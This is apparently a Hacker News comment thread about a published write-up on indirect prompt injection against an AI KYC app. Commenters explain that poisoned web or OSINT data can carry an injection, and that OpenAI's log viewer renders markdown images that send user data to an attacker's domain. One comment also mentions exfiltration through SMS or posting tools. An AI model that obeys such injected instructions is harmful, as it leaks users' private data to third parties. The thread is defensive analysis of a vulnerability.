Hacker News new | ask | show | jobs
by numlocked 149 days ago
At the risk of totally misunderstanding this...it seems to be exfiltration by the app developer, who already has access to all of these data sources and the data that the customer is inputting into the AI KYC app (in this example)...right? I don't believe this exposes any end-user information to a third party. The AI app developer is already 'trusted' and could get access to this information regardless of the exfiltration. Maybe someone can explain this to me more clearly.
4 comments

The attacker isn't the dev -- the attacker is a third party that poisoned the online data that is ingested by the AI tool.

- Dev builds secure AI app - App defends against indirect prompt injection in data from the internet - Dev reviews the flagged log - Log affected by the injection is rendered, and the attacker who wrote the injection in the web data exfiltrates the data from the AI app user

Agreed. The writeup could use a little Alice, Bob and Charlie treatment to make that more clear though.

The OSINT data seems to be the most likely source of the poisoned content. I guess you could bury that in a social media profile?

The situation this applies to is when input from the attacker is fed to a LLM, but the response from that LLM is not returned to the attacker.

If an attacker tries a prompt injection they would be unable to see the response of the LLM. In order to complete an attack they need to find an alternate way to have information sent back to them. For example if the LLM had access to a tool to send an SMS message the prompt injection could say to message the attacker, or maybe it has a tool to post on X which an attacker could then see. In this blog post the way information gets back to the attacker is by having someone load a URL by by viewing the openai log viewer.

The problem seems to be that OpenAI claims to protect against these problems. So yes, the app dev is malicious, yes, the user activated the app, but the platform (openai) also claimed to protect the user from the app dev exfiltrating data. Seems like there was a chink in the armor there.

At least that is my initial reading from this.

No, OpenAI doesn't claim to protect users from anything; this is a case of an application exfiltrating data to OpenAI, which can then end up getting leaked back out to the attacker - that's not something that is up to OpenAI to prevent, that's up to the app developer.

It's the same as if your devs accidentally sent PII to Datadog - sure, Datadog could add some kind of filter to try to block it from being recorded, but it's not their fault that your devs or application sent them data. Same situation here: bad info is being sent to OpenAI, and OpenAI's otherwise benign log viewer is rendering markdown which could load an external image that has the bad data in it's URL.

In that same situation, you'd expect Datadog to just not automatically render Markdown, but you wouldn't blame them for accepting PII that your developers willingly sent to them. Same for OpenAI, they could clean up the log console feature a bit to tighten things up but it's ultimately up to the developers to not feed secrets to a 3rd party.

it sounds like the data can be involuntarily disclosed to an external third party (the attacker’s domain) purely because someone reviewed logs that auto-load remote images

their log viewer renders the markdown and their browser will make a request containing the sensitive data to the attackers domain where it can be logged and viewed